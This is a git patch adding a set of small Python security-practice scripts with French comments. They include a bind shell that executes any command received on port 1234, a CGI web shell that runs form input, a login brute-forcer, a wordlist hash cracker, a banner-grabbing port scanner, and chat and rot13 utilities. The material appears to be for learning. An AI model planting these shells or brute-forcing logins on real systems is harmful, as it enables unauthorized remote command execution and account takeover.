From a1203ccb343703ba5ae522254f75b6384a1831a7 Mon Sep 17 00:00:00 2001 From: jerome Date: Mon, 18 Dec 2023 00:02:09 +0100 Subject: =?UTF-8?q?dep=C3=B4t=20initial?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- bindshell.py | 16 ++++++++++++++++ bruteforce.py | 27 +++++++++++++++++++++++++++ chat_client.py | 15 +++++++++++++++ chat_server.py | 18 ++++++++++++++++++ connect.py | 14 ++++++++++++++ crack_hash.py | 20 ++++++++++++++++++++ html/cgi-bin/webshell.cgi | 35 +++++++++++++++++++++++++++++++++++ html/index.html | 12 ++++++++++++ rot13.py | 4 ++++ scan.py | 17 +++++++++++++++++ 10 files changed, 178 insertions(+) create mode 100644 bindshell.py create mode 100644 bruteforce.py create mode 100644 chat_client.py create mode 100644 chat_server.py create mode 100644 connect.py create mode 100644 crack_hash.py create mode 100755 html/cgi-bin/webshell.cgi create mode 100644 html/index.html create mode 100644 rot13.py create mode 100644 scan.py diff --git a/bindshell.py b/bindshell.py new file mode 100644 index 0000000..faa014d --- /dev/null +++ b/bindshell.py @@ -0,0 +1,16 @@ +#!/usr/bin/env python3 +import socket,os + +try: + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.bind(('', 1234)) + s.listen() + conn,addr = s.accept() + while 1: + data = conn.recv(1024) + reponse=os.popen(data.decode()).read() + conn.sendall(str(reponse).encode()) +except KeyboardInterrupt: + s.close() +finally: + print("bye") diff --git a/bruteforce.py b/bruteforce.py new file mode 100644 index 0000000..45d950b --- /dev/null +++ b/bruteforce.py @@ -0,0 +1,27 @@ +import sys +import requests + +def bruteforce(url,username,password): + reponse=requests.post(url=url,data={ + "username":username, + "password":password + }) + #print(reponse.text) + if "Mauvais mot de passe" in reponse.text: + print("mauvais pwd") + return False + else: + print(f"Trouvé password \"{password}\"") + return True + +if __name__ == "__main__": + url = sys.argv[1] + dico = sys.argv[2] + with open(dico, 'r') as wordlist: + for password in wordlist.readlines(): + password=password.strip() + if bruteforce(url,"jerome",password)==True: + sys.exit() + +#bruteforce("http://localhost/page.php","jerome","secret") + diff --git a/chat_client.py b/chat_client.py new file mode 100644 index 0000000..0d1d9e8 --- /dev/null +++ b/chat_client.py @@ -0,0 +1,15 @@ +#!/usr/bin/env python3 +import socket + +try: + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.connect(("localhost", 1234)) # adresse ip + port du serveur (tuple)) + while 1: + message= input() + s.sendall(message.encode()) + data=s.recv(1024) + print(data.decode()) +except KeyboardInterrupt: + s.close() +finally: + print("bye") diff --git a/chat_server.py b/chat_server.py new file mode 100644 index 0000000..d857e99 --- /dev/null +++ b/chat_server.py @@ -0,0 +1,18 @@ +#!/usr/bin/env python3 +import socket + +try: + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.bind(('', 1234)) # toutes les interfaces réseau sur le port 1234 + s.listen() + conn,addr = s.accept() + while 1: + data=conn.recv(1024) + print(data.decode()) + reponse=input() + conn.sendall(reponse.encode()) +except KeyboardInterrupt: + s.close() +finally: + print("bye") + diff --git a/connect.py b/connect.py new file mode 100644 index 0000000..858d82f --- /dev/null +++ b/connect.py @@ -0,0 +1,14 @@ +import sys +host=sys.argv[1] +port=int(sys.argv[2]) + +import socket +s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) +addr_server=(host,port) +tentative=s.connect_ex(addr_server) #connect_ex renvoie 0 en cas de succès... +if tentative==0: + print("port 80 ouvert") +else: + print("Echec de connexion") +s.close() + diff --git a/crack_hash.py b/crack_hash.py new file mode 100644 index 0000000..a8ade90 --- /dev/null +++ b/crack_hash.py @@ -0,0 +1,20 @@ +import sys +import hashlib + +def crack_hash(hash,wordlist,hashsum) : + """ + Args: + hash : le hash à craquer + wordlist : la wordlist à utiliser + hashsum : md5 ou sha256 ou sha512... + """ + with open(wordlist,"r") as fichier: + lignes = fichier.readlines() + for ligne in lignes: + #if hashlib.md5(ligne.strip().encode()).hexdigest() == hash: + if getattr(hashlib, hashsum)(ligne.strip().encode()).hexdigest() == hash : + print(f"trouvé : {ligne}") + exit() + +if __name__ == "__main__": + crack_hash(sys.argv[1],sys.argv[2],sys.argv[3]) diff --git a/html/cgi-bin/webshell.cgi b/html/cgi-bin/webshell.cgi new file mode 100755 index 0000000..6598d37 --- /dev/null +++ b/html/cgi-bin/webshell.cgi @@ -0,0 +1,35 @@ +#!/usr/bin/env python3 + +# après avoir lancé le serveur : python3 -m http.server --cgi +# placer le script (rendu exécutable) dans /cgi-bin... + +import cgi +import os + +form = cgi.FieldStorage() +cmd = form.getvalue('command') +user = os.getlogin() +host = os.environ.get('SERVER_NAME') +pwd = os.environ.get('PWD') + +print("Content-Type: text/html; charset=UTF-8\n\n") +print (""" + + +Web shell + + +

Web shell

+

Entrez votre commande :

+
+ + +
""") +if cmd : + print("
")
+    print(f"{user}@{host}:{pwd}$ {cmd}\n{os.popen(cmd).read()}")
+    print("
") +print(""" + + +""") diff --git a/html/index.html b/html/index.html new file mode 100644 index 0000000..ac28908 --- /dev/null +++ b/html/index.html @@ -0,0 +1,12 @@ + + + +redirection + + + + + + + + diff --git a/rot13.py b/rot13.py new file mode 100644 index 0000000..f2d97b5 --- /dev/null +++ b/rot13.py @@ -0,0 +1,4 @@ +#!/usr/bin/env python3 +import codecs +message = input() +print(codecs.encode(message,'rot_13')) diff --git a/scan.py b/scan.py new file mode 100644 index 0000000..8b878ef --- /dev/null +++ b/scan.py @@ -0,0 +1,17 @@ +import socket + +host="127.0.0.1" +for port in range(0,65535): + try: + s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) + s.settimeout(0.5) + s.connect((host,port)) # un tuple en argument : (( )) + try: + banner = s.recv(1024) + print("Le port ",port," est ouvert", banner.decode("utf-8").strip()) + except: + print("Le port ",port," est ouvert") + except: + pass + +s.close() -- cgit v1.2.3